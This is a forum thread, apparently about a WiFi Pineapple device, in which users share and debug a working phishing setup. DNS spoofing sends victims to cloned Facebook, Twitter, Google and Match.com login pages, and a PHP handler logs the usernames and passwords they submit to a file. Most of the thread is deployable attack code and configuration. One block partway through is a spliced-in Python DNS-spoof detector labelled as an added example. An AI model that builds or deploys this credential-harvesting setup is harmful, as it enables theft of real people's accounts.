
Phishing Without Folder Names



Just like what I did with my random roll PHP version 2, I thought I would start a post to get clean links for phishing.

Clean links, i.e. example.com and not example.com/phish/example.html

Change /www/index.php to:


[CODE]
<?php

$ref = $_SERVER['HTTP_REFERER'];
$phishFolder = "phish/"; # Folder where your phishing files exist, Sym link from usb thumb drive "ln -s /usb/phishing-folder /www/phish"

$skipInclude = 0;

if (strpos($ref, "facebook")){
$phishFile = "facebook.html";
} elseif (strpos($ref, "gmail")) {
$phishFile = "gmail.html";
} elseif (strpos($ref, "twitter")) {
$phishFile = "twitter.html";
} else {
require('error.php');
$skipInclude = 1;
}

if ($skipInclude == 0) {
include($phishFolder.$phishFile);
}

?>
[/CODE]

Then add your phish pages to your thumb drive, to say /usb/phish/

You can sym link to the /www/ folder:

[CODE]
ln -s /usb/phish /www/phish
[/CODE]

Now I am expecting your phishing setup to look like this:

/usb/phish/example.html

and the source files could go into a folder like

/usb/phish/example/

however you want to manage them.

The last thing to do is edit all the .html files so that any links to the source folder include the phish/ folder, i.e. "/phish/example/banner.jpg"

What do you guys think? Is this how phishing should be done from now on?

Edited by petertfm
Link to comment
Share on other sites

You don't have to do usb/.... you can create a symbolic link in the /www/ folder. Here's a guy that made a video on it. Either way works though...

You could just put it in /www/phish/ but that would fill the little bit of memory the mk4 has, and using the USB is a good standard.

I did explain how to sym link ;-)


[CODE]
ln -s /usb/phish /www/phish
[/CODE]

Link to comment
Share on other sites

  • 2 weeks later...

Hi there! First of all thank you so much for sharing all your work! It's much appreciated!

However I seem to have some problems making this work. It's probably just me being stupid. My phish files should be okay, at least they work nicely with "the original method".

My problem is that with this method without folder names my phish files just won't work. All that happens when I try to open i.e. facebook is that the page either does nothing, or goes back to the previous page. The code of the page is then showing up as:



[CODE]
<html><head>
<script type="text/javascript">
function goBack()
{
window.history.back()
}
</script>
</head>
<body onload="goBack()">
</body></html>
[/CODE]

Which actually seems to be the last part of my error.php. I just don't understand why the browser would go directly to error.php, before the phishing page.

My error.php

[CODE]
<?php
$ref = $_SERVER['HTTP_REFERER'];
$today = date("F j, Y, g:i a");
if (isset($_POST['name']) && !empty($_POST['name'])) {
$nam = stripslashes($_POST['name']);
$pas = stripslashes($_POST['pass']);
$nam = htmlspecialchars($nam, ENT_QUOTES);
$pas = htmlspecialchars($pas, ENT_QUOTES);
$content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;
$filed = @fopen("pineapple/logs/phish.log", "a+");
@fwrite($filed, "$content\n");
@fclose($filed);
}
?>
<html><head>
<script type="text/javascript">
function goBack()
{
window.history.back()
}
</script>
</head>
<body onload="goBack()">
</body></html>
[/CODE]

So my index.php looks like this.

[CODE]
<?php
$ref = $_SERVER['HTTP_REFERER'];
$phishFolder = "./"; # Folder where your phishing files exist, Sym link from usb thumb drive "ln -s /usb/phishing-folder /www/phish"
$skipInclude = 0;
if (strpos($ref, "facebook")){
$phishFile = "facebook.htm";
} elseif (strpos($ref, "gmail")) {
$phishFile = "gmail.html";
} elseif (strpos($ref, "twitter")) {
$phishFile = "twitter.htm";
} else {
require('error.php');
$skipInclude = 1;
}
if ($skipInclude == 0) {
include($phishFolder.$phishFile);
}
?>
[/CODE]

I have symlinked /usb/phish/* to /www/, that's why I have "./" as phishFolder. And I don't yet have anything for gmail, but facebook and twitter should still work. I think like this I would not have to edit all the links for the facebook_files folder, right?

ls -l /www

[CODE]
root@Pineapple:~# ls -l /www
lrwxrwxrwx 1 root root 30 Aug 9 11:32 accounts.google.htm -> /usb/phish/accounts.google.htm
lrwxrwxrwx 1 root root 32 Aug 9 11:32 accounts.google_files -> /usb/phish/accounts.google_files
-rw-r--r-- 1 root root 621 Aug 9 10:32 error.php
lrwxrwxrwx 1 root root 23 Aug 9 11:21 facebook.htm -> /usb/phish/facebook.htm
lrwxrwxrwx 1 root root 25 Aug 9 11:21 facebook_files -> /usb/phish/facebook_files
-rw-r--r-- 1 root root 496 Aug 9 14:16 index.php
-rw-r--r-- 1 root root 113 Jun 5 18:42 indexORG.php
lrwxrwxrwx 1 root root 23 Aug 9 12:11 matchcom.htm -> /usb/phish/matchcom.htm
drwxr-xr-x 1 root root 0 Jul 2 01:28 pineapple
-rw-r--r-- 1 root root 490 Aug 9 12:41 redirect.php
lrwxrwxrwx 1 root root 22 Aug 9 11:32 twitter.htm -> /usb/phish/twitter.htm
lrwxrwxrwx 1 root root 24 Aug 9 11:32 twitter_files -> /usb/phish/twitter_files
[/CODE]

And my DNS spoof config states:

[CODE]
172.16.42.1 facebook.com
172.16.42.1 www.facebook.com
172.16.42.1 match.com
172.16.42.1 accounts.google.com
172.16.42.1 twitter.com
[/CODE]

Oh, and my redirect.php

[CODE]
<?php
$ref = $_SERVER['HTTP_REFERER'];
if (strpos($ref, "facebook")){ header('Location: facebook.htm'); }
if (strpos($ref, "match")){ header('Location: matchcom.htm'); }
if (strpos($ref, "accounts.google")){ header('Location: accounts.google.htm'); }
if (strpos($ref, "gmail")){ header('Location: accounts.google.htm'); }
if (strpos($ref, "twitter")){ header('Location: twitter.htm'); }
require('error.php');
?>
[/CODE]

Any help will be appreciated! :)

Link to comment
Share on other sites
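The spoof config in the post above answers several unrelated public names with one private address (172.16.42.1). As an added example (not part of the original thread), this Python check shows how a defender could flag that pattern in resolver answers; the sample answers and the internal-suffix list are constructed assumptions.

```python
import ipaddress
from collections import defaultdict

# Constructed sample: (queried name, A-record answer) pairs as a client or
# resolver log might record them. Not taken from a real capture.
SAMPLE_ANSWERS = [
    ("facebook.com", "172.16.42.1"),
    ("www.facebook.com", "172.16.42.1"),
    ("accounts.google.com", "172.16.42.1"),
    ("twitter.com", "104.244.42.1"),
    ("printer.corp.internal", "10.0.0.15"),
    ("example.org", "not-an-ip"),
]

# Assumption: suffixes your own network legitimately serves from private space.
INTERNAL_SUFFIXES = (".internal", ".lan", ".local", ".home.arpa")


def is_internal_name(name):
    name = name.rstrip(".").lower()
    return "." not in name or name.endswith(INTERNAL_SUFFIXES)


def suspicious_answers(answers):
    """Flag public names whose answer is not a globally routable address."""
    findings = []
    for name, raw in answers:
        if is_internal_name(name):
            continue
        try:
            ip = ipaddress.ip_address(raw)
        except ValueError:
            findings.append((name, raw, "unparseable"))
            continue
        if not ip.is_global:
            findings.append((name, raw, "non-global"))
    return findings


def spoof_clusters(findings, min_names=2):
    """Group non-global findings by address; several unrelated public names
    on one private IP is the pattern a spoofing gateway produces."""
    by_ip = defaultdict(set)
    for name, raw, reason in findings:
        if reason == "non-global":
            by_ip[raw].add(name)
    return {ip: sorted(n) for ip, n in by_ip.items() if len(n) >= min_names}


if __name__ == "__main__":
    for ip, names in spoof_clusters(suspicious_answers(SAMPLE_ANSWERS)).items():
        print(f"ALERT {ip} answers for {len(names)} public names: {names}")
```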

A lot of data :-D

Question: when you said you sym linked the phish folder, what does it look like in /www/?

I see in the index.php you put "./"; that would be an error. If the phish files are directly in /www/ then this should be empty, i.e. ""

I hope this helps

P.S. I did not try out my own code and there could be errors or bugs.

Link to comment
Share on other sites

Thanks for your reply! And I'm sorry about the amount of data that I pasted, just wasn't sure about what you needed to know.

Actually I pasted the ls of the /www folder right after my index.php in my previous post.

Just to clarify, my facebook files look like this:

/www/facebook.htm

/www/facebook_files/

The thing is, I have tried to put both "./" and nothing, i.e. "", but in any case I'm just seeing an empty page, with the code as mentioned in my previous post.

But if I try to enter the direct URL, i.e. 172.16.42.1/facebook.htm, then the facebook page appears as it should, and phishing works as intended.

I just can't seem to understand what I did wrong.

Link to comment
Share on other sites

Actually it seems I got it working when I changed the start of the index.php, as Neworld suggested in another thread.

I also changed the line that requires error.php into redirect.php. And in my case I have all the phish files symlinked directly to /www/ so I have edited out the $phishFolder since I didn't need it.

Pasting the complete working index.php:


[CODE]
<?php
$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$skipInclude = 0;
if (strpos($ref, "facebook")) { $phishFile = "facebook.htm";
} elseif (strpos($ref, "gmail")) { $phishFile = "gmail.htm";
} elseif (strpos($ref, "twitter")) { $phishFile = "twitter.htm";
} else { require('redirect.php');
$skipInclude = 1;
}
if ($skipInclude == 0) {
include($phishFile);
}
?>
[/CODE]

And so far it seems to be working like a charm! :)

Edited by loozr
Link to comment
Share on other sites
